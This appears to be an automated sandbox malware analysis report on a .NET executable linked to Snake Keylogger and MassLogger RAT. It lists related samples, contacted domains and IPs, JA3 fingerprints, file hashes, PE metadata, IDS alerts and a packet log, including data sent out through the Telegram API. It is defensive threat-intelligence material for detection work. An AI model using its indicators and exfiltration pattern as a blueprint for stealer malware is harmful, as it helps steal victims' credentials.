	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PK5pHX4Gu5.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	prgNb8YFEA.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	rlPy5vt1Dg.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	wZ6VEnOkie.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	prlsqnzspl.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	dZMT94YYwO.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	tNXl4XhgmV.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	MBOaS3GRtF.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
reallyfreegeoip.org	prgNb8YFEA.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	rlPy5vt1Dg.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	wZ6VEnOkie.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	prlsqnzspl.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	dZMT94YYwO.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	tNXl4XhgmV.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	MBOaS3GRtF.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
api.telegram.org	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	JGvCEaqruI.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	JGvCEaqruI.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
ORACLE-BMC-31898US	prgNb8YFEA.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	prlsqnzspl.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	dZMT94YYwO.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	rwlPT9YJt0.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
CLOUDFLARENETUS	https://mrohailkhan.com/energyaustralia/auth/auhs1/	Get hash	malicious	Unknown	Browse	172.64.155.59
	3.elf	Get hash	malicious	Unknown	Browse	1.1.1.1
	prgNb8YFEA.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	wSoShbuXnJ.exe	Get hash	malicious	FormBook	Browse	104.21.86.111
	1507513743282749438.js	Get hash	malicious	Strela Downloader	Browse	162.159.61.3
	rlPy5vt1Dg.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	C6Abn5cBei.exe	Get hash	malicious	FormBook	Browse	172.67.145.234
	wZ6VEnOkie.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	prlsqnzspl.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	ZcshRk2lgh.exe	Get hash	malicious	FormBook	Browse	104.21.15.100

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	prgNb8YFEA.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	rlPy5vt1Dg.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	wZ6VEnOkie.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	prlsqnzspl.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	dZMT94YYwO.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	tNXl4XhgmV.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	MBOaS3GRtF.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.112.1
3b5074b1b5d032e5620f69f9f700ff0e	ZFCKpFXpzx.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	ZFCKpFXpzx.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	ZeAX5i7cGB.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	jKqPSehspS.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	A6AHI7Uk18.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Wru9ycO2MJ.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	iNFGd6bDZX.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	MyzWeEOlqb.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	5hD3Yjf7xD.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	AJ5zYYsisA.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\5qJ6QQTcRS.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4x84qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHxviYHKh3oPtHo6hAHKzea
MD5:	7B709BC412BEC5C3CFD861C041DAD408
SHA1:	532EA6BB3018AE3B51E7A5788F614A6C49252BCF
SHA-256:	733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
SHA-512:	B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.032184003707178
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	5qJ6QQTcRS.exe
File size:	838'144 bytes
MD5:	78668d52e5b092184a4b8e6788713b3c
SHA1:	302e6b4b4f6441acbbfe4e55c6f6d8a83d94f7eb
SHA256:	e5691b515fc141f456826af6833f83e2c2f950bc8d283dac38b676abe845924c
SHA512:	268bc3599a5cdf1ca28718a460a8fd6c9b3de7f76b5ea59bbf2e9956464c54c8a7b80c0fd1cc788a9c3bc1dad10527c35d953dff9a59df9a3e88a629b8b419ca
SSDEEP:	12288:yjvtDL3M7b58soVv4mRPVg5MCao3AiqLwgDS7P2P:yjvV3Mn2jgyo3A9Lu7PO
TLSH:	CF05E0107354ED79F8B800329B70C7F642ADEE0644B7569F486E7A97BCBC2163AF2494
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....,......................>........... ........@.. ....................... ............`................................

File Icon


Icon Hash:	74f0d4d4d4d4d4cc

Static PE Info

General

Entrypoint:	0x4ba9be
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x112C0316 [Sat Feb 17 10:57:26 1979 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba968	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xbc000	0x13ac8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb89c4	0xb8a00	011a1ed1c3deadd8bbf692a003c6ab16	False	0.6490087593094109	DIY-Thermocam raw data (Lepton 2.x), scale 0-9472, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 1103944034025472.000000	7.081769071361407	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xbc000	0x13ac8	0x13c00	1c52a2cb8e3deb1ba06c2049ad1979d1	False	0.4259913963607595	data	6.010546228059377	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd0000	0xc	0x200	26e5937dec86f8fb8460b87f50234a81	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xbc658	0x42b0	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9922680412371134
RT_ICON	0xc0908	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors			0.4594882729211087
RT_ICON	0xc17b0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors			0.48826714801444043
RT_ICON	0xc2058	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors			0.478110599078341
RT_ICON	0xc2720	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors			0.37210982658959535
RT_ICON	0xc2c88	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600			0.24201244813278008
RT_ICON	0xc5230	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224			0.2924484052532833
RT_ICON	0xc62d8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400			0.3942622950819672
RT_ICON	0xc6c60	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088			0.49379432624113473
RT_ICON	0xc70c8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640			0.33198924731182794
RT_ICON	0xc73b0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192			0.41216216216216217
RT_ICON	0xc74d8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192			0.42905405405405406
RT_ICON	0xc7600	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640			0.2661290322580645
RT_ICON	0xc78e8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512			0.18010752688172044
RT_ICON	0xc7bd0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128			0.35135135135135137
RT_ICON	0xc7cf8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors			0.06092057761732852
RT_ICON	0xc85a0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors			0.07658959537572255
RT_ICON	0xc8b08	0xca8	Device independent bitmap graphic, 32 x 64 x 24, image size 3072			0.042901234567901236
RT_ICON	0xc97b0	0x368	Device independent bitmap graphic, 16 x 32 x 24, image size 768			0.10550458715596331
RT_ICON	0xc9b18	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0			0.6400709219858156
RT_ICON	0xc9f80	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192			0.5
RT_ICON	0xca0a8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088			0.19060283687943264
RT_ICON	0xca510	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352			0.11429872495446267
RT_ICON	0xcb638	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792			0.07211147274206672
RT_ICON	0xcdca0	0x1952	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.7099660598580685
RT_GROUP_ICON	0xcf5f4	0x3e	data			0.8709677419354839
RT_GROUP_ICON	0xcf634	0x84	data			0.6893939393939394
RT_GROUP_ICON	0xcf6b8	0x22	data			1.0588235294117647
RT_GROUP_ICON	0xcf6dc	0x22	data			1.0588235294117647
RT_GROUP_ICON	0xcf700	0x5a	data			0.7666666666666667
RT_GROUP_ICON	0xcf75c	0x22	data			1.1176470588235294
RT_VERSION	0xcf780	0x348	data	English	United States	0.4154761904761905

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T06:14:34.400712+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49980	158.101.44.242	80	TCP
2025-01-11T06:14:35.291474+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49980	158.101.44.242	80	TCP
2025-01-11T06:14:35.817329+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49982	104.21.112.1	443	TCP
2025-01-11T06:14:36.463329+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49983	158.101.44.242	80	TCP
2025-01-11T06:14:38.214770+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49986	104.21.112.1	443	TCP
2025-01-11T06:14:40.599478+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49990	104.21.112.1	443	TCP
2025-01-11T06:14:41.832235+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49992	104.21.112.1	443	TCP
2025-01-11T06:14:44.289038+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49996	104.21.112.1	443	TCP
2025-01-11T06:14:45.212528+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.10	49997	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 06:14:33.602204084 CET	49980	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:33.607120037 CET	80	49980	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:33.607213974 CET	49980	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:33.607675076 CET	49980	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:33.612521887 CET	80	49980	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:34.185796976 CET	80	49980	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:34.190495014 CET	49980	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:34.195360899 CET	80	49980	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:34.345936060 CET	80	49980	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:34.399957895 CET	49981	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:34.399997950 CET	443	49981	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:34.400084972 CET	49981	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:34.400712013 CET	49980	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:34.405935049 CET	49981	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:34.405953884 CET	443	49981	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:34.890487909 CET	443	49981	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:34.891751051 CET	49981	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:34.894030094 CET	49981	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:34.894042969 CET	443	49981	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:34.894328117 CET	443	49981	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:34.942106962 CET	49981	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:34.987335920 CET	443	49981	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:35.062614918 CET	443	49981	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:35.062691927 CET	443	49981	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:35.063117981 CET	49981	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:35.070328951 CET	49981	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:35.073086977 CET	49980	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:35.077908993 CET	80	49980	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:35.240240097 CET	80	49980	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:35.243752956 CET	49982	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:35.243773937 CET	443	49982	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:35.244141102 CET	49982	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:35.244141102 CET	49982	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:35.244165897 CET	443	49982	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:35.291474104 CET	49980	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:35.706233978 CET	443	49982	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:35.708589077 CET	49982	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:35.708612919 CET	443	49982	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:35.817337036 CET	443	49982	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:35.817416906 CET	443	49982	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:35.817493916 CET	49982	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:35.817971945 CET	49982	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:35.821588993 CET	49980	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:35.822902918 CET	49983	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:35.826585054 CET	80	49980	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:35.827266932 CET	49980	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:35.827795029 CET	80	49983	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:35.827878952 CET	49983	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:35.828012943 CET	49983	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:35.832873106 CET	80	49983	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:36.409315109 CET	80	49983	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:36.411868095 CET	49984	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:36.411911011 CET	443	49984	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:36.411990881 CET	49984	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:36.412235022 CET	49984	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:36.412250996 CET	443	49984	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:36.463329077 CET	49983	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:36.871130943 CET	443	49984	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:36.873426914 CET	49984	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:36.873450041 CET	443	49984	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:37.005429029 CET	443	49984	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:37.005496979 CET	443	49984	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:37.005578995 CET	49984	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:37.006072998 CET	49984	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:37.010715961 CET	49985	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:37.015557051 CET	80	49985	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:37.015618086 CET	49985	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:37.015734911 CET	49985	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:37.020514011 CET	80	49985	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:37.588841915 CET	80	49985	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:37.600975037 CET	49986	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:37.601016045 CET	443	49986	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:37.601097107 CET	49986	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:37.601567984 CET	49986	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:37.601587057 CET	443	49986	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:37.635092974 CET	49985	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:38.075851917 CET	443	49986	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:38.078191042 CET	49986	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:38.078212023 CET	443	49986	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:38.214803934 CET	443	49986	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:38.214898109 CET	443	49986	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:38.214941978 CET	49986	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:38.215363026 CET	49986	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:38.219417095 CET	49985	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:38.220593929 CET	49987	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:38.224349976 CET	80	49985	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:38.224390984 CET	49985	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:38.225343943 CET	80	49987	158.101.44.242	192.168.2.10
